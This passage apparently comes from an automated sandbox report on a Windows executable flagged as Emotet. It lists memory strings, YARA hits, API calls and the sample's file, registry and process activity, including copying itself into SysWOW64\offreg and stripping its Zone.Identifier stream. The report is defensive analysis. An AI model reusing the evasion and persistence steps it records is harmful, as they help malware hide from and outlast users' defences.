                Source: svchost.exe, 00000009.00000003.304378373.00000189FAC60000.00000004.00000001.sdmpString found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
                Source: svchost.exe, 00000007.00000002.499986642.000002776643E000.00000004.00000001.sdmpString found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
                Source: svchost.exe, 00000007.00000002.499986642.000002776643E000.00000004.00000001.sdmpString found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
                Source: svchost.exe, 00000009.00000003.304423488.00000189FAC5C000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
                Source: svchost.exe, 00000009.00000003.304378373.00000189FAC60000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
                Source: svchost.exe, 00000009.00000003.304448108.00000189FAC3D000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
                Source: svchost.exe, 00000009.00000003.304378373.00000189FAC60000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
                Source: svchost.exe, 00000009.00000002.304752691.00000189FAC4E000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
                Source: svchost.exe, 00000009.00000003.304448108.00000189FAC3D000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
                Source: svchost.exe, 00000009.00000003.304378373.00000189FAC60000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
                Source: svchost.exe, 00000009.00000003.304378373.00000189FAC60000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
                Source: svchost.exe, 00000009.00000003.304378373.00000189FAC60000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
                Source: svchost.exe, 00000009.00000003.304448108.00000189FAC3D000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
                Source: svchost.exe, 00000009.00000003.304448108.00000189FAC3D000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
                Source: svchost.exe, 00000009.00000003.304378373.00000189FAC60000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
                Source: svchost.exe, 00000009.00000003.304448108.00000189FAC3D000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
                Source: svchost.exe, 00000009.00000003.304423488.00000189FAC5C000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
                Source: svchost.exe, 00000009.00000003.304461962.00000189FAC57000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
                Source: svchost.exe, 00000009.00000003.304461962.00000189FAC57000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
                Source: svchost.exe, 00000009.00000003.304362631.00000189FAC63000.00000004.00000001.sdmp, svchost.exe, 00000009.00000003.304423488.00000189FAC5C000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t
                Source: svchost.exe, 00000009.00000003.304378373.00000189FAC60000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
                Source: svchost.exe, 00000009.00000003.304448108.00000189FAC3D000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
                Source: svchost.exe, 00000009.00000003.282341155.00000189FAC31000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
                Source: svchost.exe, 00000009.00000003.304448108.00000189FAC3D000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
                Source: svchost.exe, 00000009.00000003.304448108.00000189FAC3D000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
                Source: svchost.exe, 00000009.00000003.304448108.00000189FAC3D000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
                Source: svchost.exe, 00000009.00000003.304448108.00000189FAC3D000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
                Source: svchost.exe, 00000009.00000003.282341155.00000189FAC31000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
                Source: svchost.exe, 00000009.00000002.304715723.00000189FAC3A000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
                Source: svchost.exe, 00000009.00000002.304752691.00000189FAC4E000.00000004.00000001.sdmpString found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
                Source: WpPortingLibrary.exe, 00000003.00000002.500142679.0000000000E5A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
                Source: WpPortingLibrary.exe, 00000003.00000002.500142679.0000000000E5A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                E-Banking Fraud:

                barindex
                Yara detected EmotetShow sources
                Source: Yara matchFile source: 00000000.00000002.238986600.0000000002EB4000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.500653398.00000000029F0000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.239016780.0000000002EF1000.00000020.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.500762111.0000000002A34000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.238943742.0000000002E70000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.500809704.0000000002A71000.00000020.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0.2.FsWcL0gpTv.exe.2ef0000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.WpPortingLibrary.exe.2a70000.1.unpack, type: UNPACKEDPE
                Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exeCode function: 3_2_02A72650 CryptAcquireContextW,CryptGenKey,CryptCreateHash,CryptImportKey,LocalFree,CryptDecodeObjectEx,CryptDecodeObjectEx,3_2_02A72650
                Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exeCode function: 3_2_02A72650 CryptAcquireContextW,CryptGenKey,CryptCreateHash,CryptImportKey,LocalFree,CryptDecodeObjectEx,CryptDecodeObjectEx,3_2_02A72650
                Source: C:\Users\user\Desktop\FsWcL0gpTv.exeFile created: C:\Windows\SysWOW64\offreg\Jump to behavior
                Source: C:\Users\user\Desktop\FsWcL0gpTv.exeFile created: C:\Windows\SysWOW64\offreg\Jump to behavior
                Source: C:\Users\user\Desktop\FsWcL0gpTv.exeFile deleted: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe:Zone.IdentifierJump to behavior
                Source: C:\Users\user\Desktop\FsWcL0gpTv.exeFile deleted: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe:Zone.IdentifierJump to behavior
                Source: C:\Users\user\Desktop\FsWcL0gpTv.exeCode function: 0_2_02EF82400_2_02EF8240
                Source: C:\Users\user\Desktop\FsWcL0gpTv.exeCode function: 0_2_02EF3BA00_2_02EF3BA0
                Source: C:\Users\user\Desktop\FsWcL0gpTv.exeCode function: 0_2_02EF1C700_2_02EF1C70
                Source: C:\Users\user\Desktop\FsWcL0gpTv.exeCode function: 0_2_02EF77400_2_02EF7740
                Source: C:\Users\user\Desktop\FsWcL0gpTv.exeCode function: 0_2_02EF3F200_2_02EF3F20
                Source: C:\Users\user\Desktop\FsWcL0gpTv.exeCode function: 0_2_02EF65300_2_02EF6530
                Source: C:\Users\user\Desktop\FsWcL0gpTv.exeCode function: 0_2_02EF3D100_2_02EF3D10
                Source: C:\Users\user\Desktop\FsWcL0gpTv.exeCode function: 0_2_02E792DE0_2_02E792DE
                Source: C:\Users\user\Desktop\FsWcL0gpTv.exeCode function: 0_2_02E75ABE0_2_02E75ABE
                Source: C:\Users\user\Desktop\FsWcL0gpTv.exeCode function: 0_2_02E7573E0_2_02E7573E
                Source: C:\Users\user\Desktop\FsWcL0gpTv.exeCode function: 0_2_02E780CE0_2_02E780CE
                Source: C:\Users\user\Desktop\FsWcL0gpTv.exeCode function: 0_2_02E758AE0_2_02E758AE
                Source: C:\Users\user\Desktop\FsWcL0gpTv.exeCode function: 0_2_02E870690_2_02E87069
                Source: C:\Users\user\Desktop\FsWcL0gpTv.exeCode function: 0_2_02E7380E0_2_02E7380E
                Source: C:\Users\user\Desktop\FsWcL0gpTv.exeCode function: 0_2_02E79DDE0_2_02E79DDE
                Source: C:\Users\user\Desktop\FsWcL0gpTv.exeCode function: 0_2_02EF82400_2_02EF8240
                Source: C:\Users\user\Desktop\FsWcL0gpTv.exeCode function: 0_2_02EF3BA00_2_02EF3BA0
                Source: C:\Users\user\Desktop\FsWcL0gpTv.exeCode function: 0_2_02EF1C700_2_02EF1C70
                Source: C:\Users\user\Desktop\FsWcL0gpTv.exeCode function: 0_2_02EF77400_2_02EF7740
                Source: C:\Users\user\Desktop\FsWcL0gpTv.exeCode function: 0_2_02EF3F200_2_02EF3F20
                Source: C:\Users\user\Desktop\FsWcL0gpTv.exeCode function: 0_2_02EF65300_2_02EF6530
                Source: C:\Users\user\Desktop\FsWcL0gpTv.exeCode function: 0_2_02EF3D100_2_02EF3D10
                Source: C:\Users\user\Desktop\FsWcL0gpTv.exeCode function: 0_2_02E792DE0_2_02E792DE
                Source: C:\Users\user\Desktop\FsWcL0gpTv.exeCode function: 0_2_02E75ABE0_2_02E75ABE
                Source: C:\Users\user\Desktop\FsWcL0gpTv.exeCode function: 0_2_02E7573E0_2_02E7573E
                Source: C:\Users\user\Desktop\FsWcL0gpTv.exeCode function: 0_2_02E780CE0_2_02E780CE
                Source: C:\Users\user\Desktop\FsWcL0gpTv.exeCode function: 0_2_02E758AE0_2_02E758AE
                Source: C:\Users\user\Desktop\FsWcL0gpTv.exeCode function: 0_2_02E870690_2_02E87069
                Source: C:\Users\user\Desktop\FsWcL0gpTv.exeCode function: 0_2_02E7380E0_2_02E7380E
                Source: C:\Users\user\Desktop\FsWcL0gpTv.exeCode function: 0_2_02E79DDE0_2_02E79DDE
                Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exeCode function: 3_2_02A782403_2_02A78240
                Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exeCode function: 3_2_02A73BA03_2_02A73BA0
                Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exeCode function: 3_2_02A73F203_2_02A73F20
                Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exeCode function: 3_2_02A765303_2_02A76530
                Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exeCode function: 3_2_02A73D103_2_02A73D10
                Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exeCode function: 3_2_02A71C703_2_02A71C70
                Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exeCode function: 3_2_02A777403_2_02A77740
                Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exeCode function: 3_2_029F5ABE3_2_029F5ABE
                Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exeCode function: 3_2_029F92DE3_2_029F92DE
                Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exeCode function: 3_2_029F573E3_2_029F573E
                Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exeCode function: 3_2_029F58AE3_2_029F58AE
                Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exeCode function: 3_2_029F80CE3_2_029F80CE
                Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exeCode function: 3_2_029F380E3_2_029F380E
                Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exeCode function: 3_2_02A070693_2_02A07069
                Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exeCode function: 3_2_029F9DDE3_2_029F9DDE
                Source: FsWcL0gpTv.exe, 00000000.00000002.239297268.0000000003410000.00000002.00000001.sdmpBinary or memory string: originalfilename vs FsWcL0gpTv.exe
                Source: FsWcL0gpTv.exe, 00000000.00000002.239297268.0000000003410000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs FsWcL0gpTv.exe
                Source: FsWcL0gpTv.exe, 00000000.00000002.239187518.0000000003310000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs FsWcL0gpTv.exe
                Source: FsWcL0gpTv.exe, 00000000.00000002.239297268.0000000003410000.00000002.00000001.sdmpBinary or memory string: originalfilename vs FsWcL0gpTv.exe
                Source: FsWcL0gpTv.exe, 00000000.00000002.239297268.0000000003410000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs FsWcL0gpTv.exe
                Source: FsWcL0gpTv.exe, 00000000.00000002.239187518.0000000003310000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs FsWcL0gpTv.exe
                Source: C:\Windows\System32\svchost.exeSection loaded: xboxlivetitleid.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: cdpsgshims.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: xboxlivetitleid.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: cdpsgshims.dllJump to behavior
                Source: classification engineClassification label: mal80.troj.evad.winEXE@16/5@0/5
                Source: C:\Users\user\Desktop\FsWcL0gpTv.exeCode function: CloseServiceHandle,_snwprintf,CreateServiceW,CloseServiceHandle,0_2_02EF87D0
                Source: C:\Users\user\Desktop\FsWcL0gpTv.exeCode function: CloseServiceHandle,_snwprintf,CreateServiceW,CloseServiceHandle,0_2_02EF87D0
                Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exeCode function: 3_2_02A74CB0 CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,Process32NextW,CloseHandle,FindCloseChangeNotification,3_2_02A74CB0
                Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exeCode function: 3_2_02A74CB0 CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,Process32NextW,CloseHandle,FindCloseChangeNotification,3_2_02A74CB0
                Source: C:\Users\user\Desktop\FsWcL0gpTv.exeCode function: 0_2_02EF5070 EnumServicesStatusExW,GetTickCount,ChangeServiceConfig2W,OpenServiceW,QueryServiceConfig2W,CloseServiceHandle,GetProcessHeap,0_2_02EF5070
                Source: C:\Users\user\Desktop\FsWcL0gpTv.exeCode function: 0_2_02EF5070 EnumServicesStatusExW,GetTickCount,ChangeServiceConfig2W,OpenServiceW,QueryServiceConfig2W,CloseServiceHandle,GetProcessHeap,0_2_02EF5070
                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5284:120:WilError_01
                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5284:120:WilError_01
                Source: FsWcL0gpTv.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                Source: FsWcL0gpTv.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\FsWcL0gpTv.exeFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\FsWcL0gpTv.exeFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\FsWcL0gpTv.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: C:\Users\user\Desktop\FsWcL0gpTv.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: FsWcL0gpTv.exeVirustotal: Detection: 61%
                Source: FsWcL0gpTv.exeMetadefender: Detection: 45%
                Source: FsWcL0gpTv.exeReversingLabs: Detection: 70%
                Source: FsWcL0gpTv.exeVirustotal: Detection: 61%
                Source: FsWcL0gpTv.exeMetadefender: Detection: 45%
                Source: FsWcL0gpTv.exeReversingLabs: Detection: 70%
                Source: unknownProcess created: C:\Users\user\Desktop\FsWcL0gpTv.exe 'C:\Users\user\Desktop\FsWcL0gpTv.exe'
                Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -p -s NgcSvc
                Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s NgcCtnrSvc
                Source: unknownProcess created: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
                Source: unknownProcess created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
                Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                Source: unknownProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
                Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\FsWcL0gpTv.exeProcess created: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe C:\Windows\SysWOW64\offreg\WpPortingLibrary.exeJump to behavior
                Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenableJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\FsWcL0gpTv.exe 'C:\Users\user\Desktop\FsWcL0gpTv.exe'
                Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -p -s NgcSvc
                Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s NgcCtnrSvc
                Source: unknownProcess created: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
                Source: unknownProcess created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
                Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                Source: unknownProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
                Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\FsWcL0gpTv.exeProcess created: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe C:\Windows\SysWOW64\offreg\WpPortingLibrary.exeJump to behavior
                Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenableJump to behavior
                Source: C:\Users\user\Desktop\FsWcL0gpTv.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                Source: C:\Users\user\Desktop\FsWcL0gpTv.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                Source: C:\Users\user\Desktop\FsWcL0gpTv.exeCode function: 0_2_02EB1030 LoadLibraryW,GetProcAddress,SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,SetLastError,GetProcessHeap,RtlAllocateHeap,SetLastError,0_2_02EB1030
                Source: C:\Users\user\Desktop\FsWcL0gpTv.exeCode function: 0_2_02EB1030 LoadLibraryW,GetProcAddress,SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,SetLastError,GetProcessHeap,RtlAllocateHeap,SetLastError,0_2_02EB1030
                Source: C:\Users\user\Desktop\FsWcL0gpTv.exeCode function: 0_2_02EF5DF0 push ecx; mov dword ptr [esp], 0000AAF5h0_2_02EF5DF1
                Source: C:\Users\user\Desktop\FsWcL0gpTv.exeCode function: 0_2_02EF5EF0 push ecx; mov dword ptr [esp], 0000669Ch0_2_02EF5EF1
                Source: C:\Users\user\Desktop\FsWcL0gpTv.exeCode function: 0_2_02EF5DC0 push ecx; mov dword ptr [esp], 000089FAh0_2_02EF5DC1
                Source: C:\Users\user\Desktop\FsWcL0gpTv.exeCode function: 0_2_02EF5CD0 push ecx; mov dword ptr [esp], 00001CE1h0_2_02EF5CD1
                Source: C:\Users\user\Desktop\FsWcL0gpTv.exeCode function: 0_2_02EF5EA0 push ecx; mov dword ptr [esp], 0000A3FDh0_2_02EF5EA1
                Source: C:\Users\user\Desktop\FsWcL0gpTv.exeCode function: 0_2_02EF5D90 push ecx; mov dword ptr [esp], 0000B2E0h0_2_02EF5D91
                Source: C:\Users\user\Desktop\FsWcL0gpTv.exeCode function: 0_2_02EF5D50 push ecx; mov dword ptr [esp], 00006847h0_2_02EF5D51
                Source: C:\Users\user\Desktop\FsWcL0gpTv.exeCode function: 0_2_02EF5D20 push ecx; mov dword ptr [esp], 0000C5A1h0_2_02EF5D21
                Source: C:\Users\user\Desktop\FsWcL0gpTv.exeCode function: 0_2_02EF5F20 push ecx; mov dword ptr [esp], 0000E36Ch0_2_02EF5F21
                Source: C:\Users\user\Desktop\FsWcL0gpTv.exeCode function: 0_2_02EF5D00 push ecx; mov dword ptr [esp], 00001F9Eh0_2_02EF5D01
                Source: C:\Users\user\Desktop\FsWcL0gpTv.exeCode function: 0_2_02EF5E10 push ecx; mov dword ptr [esp], 0000F5B3h0_2_02EF5E11
                Source: C:\Users\user\Desktop\FsWcL0gpTv.exeCode function: 0_2_02E77ABE push ecx; mov dword ptr [esp], 0000E36Ch0_2_02E77ABF
                Source: C:\Users\user\Desktop\FsWcL0gpTv.exeCode function: 0_2_02E77A8E push ecx; mov dword ptr [esp], 0000669Ch0_2_02E77A8F
                Source: C:\Users\user\Desktop\FsWcL0gpTv.exeCode function: 0_2_02E93E9C push ebx; iretd 0_2_02E93EAF
                Source: C:\Users\user\Desktop\FsWcL0gpTv.exeCode function: 0_2_02E93E9C push FFFFFF95h; iretd 0_2_02E93EF1
                Source: C:\Users\user\Desktop\FsWcL0gpTv.exeCode function: 0_2_02E77A3E push ecx; mov dword ptr [esp], 0000A3FDh0_2_02E77A3F
                Source: C:\Users\user\Desktop\FsWcL0gpTv.exeCode function: 0_2_02E778EE push ecx; mov dword ptr [esp], 00006847h0_2_02E778EF
                Source: C:\Users\user\Desktop\FsWcL0gpTv.exeCode function: 0_2_02E778BE push ecx; mov dword ptr [esp], 0000C5A1h0_2_02E778BF
                Source: C:\Users\user\Desktop\FsWcL0gpTv.exeCode function: 0_2_02E7789E push ecx; mov dword ptr [esp], 00001F9Eh0_2_02E7789F
                Source: C:\Users\user\Desktop\FsWcL0gpTv.exeCode function: 0_2_02E7786E push ecx; mov dword ptr [esp], 00001CE1h0_2_02E7786F
                Source: C:\Users\user\Desktop\FsWcL0gpTv.exeCode function: 0_2_02E939D9 push ss; iretd 0_2_02E939DE
                Source: C:\Users\user\Desktop\FsWcL0gpTv.exeCode function: 0_2_02E779AE push ecx; mov dword ptr [esp], 0000F5B3h0_2_02E779AF
                Source: C:\Users\user\Desktop\FsWcL0gpTv.exeCode function: 0_2_02E8858F push edi; iretd 0_2_02E885A1
                Source: C:\Users\user\Desktop\FsWcL0gpTv.exeCode function: 0_2_02E7798E push ecx; mov dword ptr [esp], 0000AAF5h0_2_02E7798F
                Source: C:\Users\user\Desktop\FsWcL0gpTv.exeCode function: 0_2_02E7795E push ecx; mov dword ptr [esp], 000089FAh0_2_02E7795F
                Source: C:\Users\user\Desktop\FsWcL0gpTv.exeCode function: 0_2_02E7792E push ecx; mov dword ptr [esp], 0000B2E0h0_2_02E7792F
                Source: C:\Users\user\Desktop\FsWcL0gpTv.exeCode function: 0_2_02EF5DF0 push ecx; mov dword ptr [esp], 0000AAF5h0_2_02EF5DF1
                Source: C:\Users\user\Desktop\FsWcL0gpTv.exeCode function: 0_2_02EF5EF0 push ecx; mov dword ptr [esp], 0000669Ch0_2_02EF5EF1
                Source: C:\Users\user\Desktop\FsWcL0gpTv.exeCode function: 0_2_02EF5DC0 push ecx; mov dword ptr [esp], 000089FAh0_2_02EF5DC1
                Source: C:\Users\user\Desktop\FsWcL0gpTv.exeCode function: 0_2_02EF5CD0 push ecx; mov dword ptr [esp], 00001CE1h0_2_02EF5CD1
                Source: C:\Users\user\Desktop\FsWcL0gpTv.exeCode function: 0_2_02EF5EA0 push ecx; mov dword ptr [esp], 0000A3FDh0_2_02EF5EA1
                Source: C:\Users\user\Desktop\FsWcL0gpTv.exeCode function: 0_2_02EF5D90 push ecx; mov dword ptr [esp], 0000B2E0h0_2_02EF5D91
                Source: C:\Users\user\Desktop\FsWcL0gpTv.exeCode function: 0_2_02EF5D50 push ecx; mov dword ptr [esp], 00006847h0_2_02EF5D51
                Source: C:\Users\user\Desktop\FsWcL0gpTv.exeCode function: 0_2_02EF5D20 push ecx; mov dword ptr [esp], 0000C5A1h0_2_02EF5D21
                Source: C:\Users\user\Desktop\FsWcL0gpTv.exeCode function: 0_2_02EF5F20 push ecx; mov dword ptr [esp], 0000E36Ch0_2_02EF5F21
                Source: C:\Users\user\Desktop\FsWcL0gpTv.exeCode function: 0_2_02EF5D00 push ecx; mov dword ptr [esp], 00001F9Eh0_2_02EF5D01
                Source: C:\Users\user\Desktop\FsWcL0gpTv.exeCode function: 0_2_02EF5E10 push ecx; mov dword ptr [esp], 0000F5B3h0_2_02EF5E11
                Source: C:\Users\user\Desktop\FsWcL0gpTv.exeCode function: 0_2_02E77ABE push ecx; mov dword ptr [esp], 0000E36Ch0_2_02E77ABF
                Source: C:\Users\user\Desktop\FsWcL0gpTv.exeCode function: 0_2_02E77A8E push ecx; mov dword ptr [esp], 0000669Ch0_2_02E77A8F
                Source: C:\Users\user\Desktop\FsWcL0gpTv.exeCode function: 0_2_02E93E9C push ebx; iretd 0_2_02E93EAF
                Source: C:\Users\user\Desktop\FsWcL0gpTv.exeCode function: 0_2_02E93E9C push FFFFFF95h; iretd 0_2_02E93EF1
                Source: C:\Users\user\Desktop\FsWcL0gpTv.exeCode function: 0_2_02E77A3E push ecx; mov dword ptr [esp], 0000A3FDh0_2_02E77A3F
                Source: C:\Users\user\Desktop\FsWcL0gpTv.exeCode function: 0_2_02E778EE push ecx; mov dword ptr [esp], 00006847h0_2_02E778EF
                Source: C:\Users\user\Desktop\FsWcL0gpTv.exeCode function: 0_2_02E778BE push ecx; mov dword ptr [esp], 0000C5A1h0_2_02E778BF
                Source: C:\Users\user\Desktop\FsWcL0gpTv.exeCode function: 0_2_02E7789E push ecx; mov dword ptr [esp], 00001F9Eh0_2_02E7789F
                Source: C:\Users\user\Desktop\FsWcL0gpTv.exeCode function: 0_2_02E7786E push ecx; mov dword ptr [esp], 00001CE1h0_2_02E7786F
                Source: C:\Users\user\Desktop\FsWcL0gpTv.exeCode function: 0_2_02E939D9 push ss; iretd 0_2_02E939DE
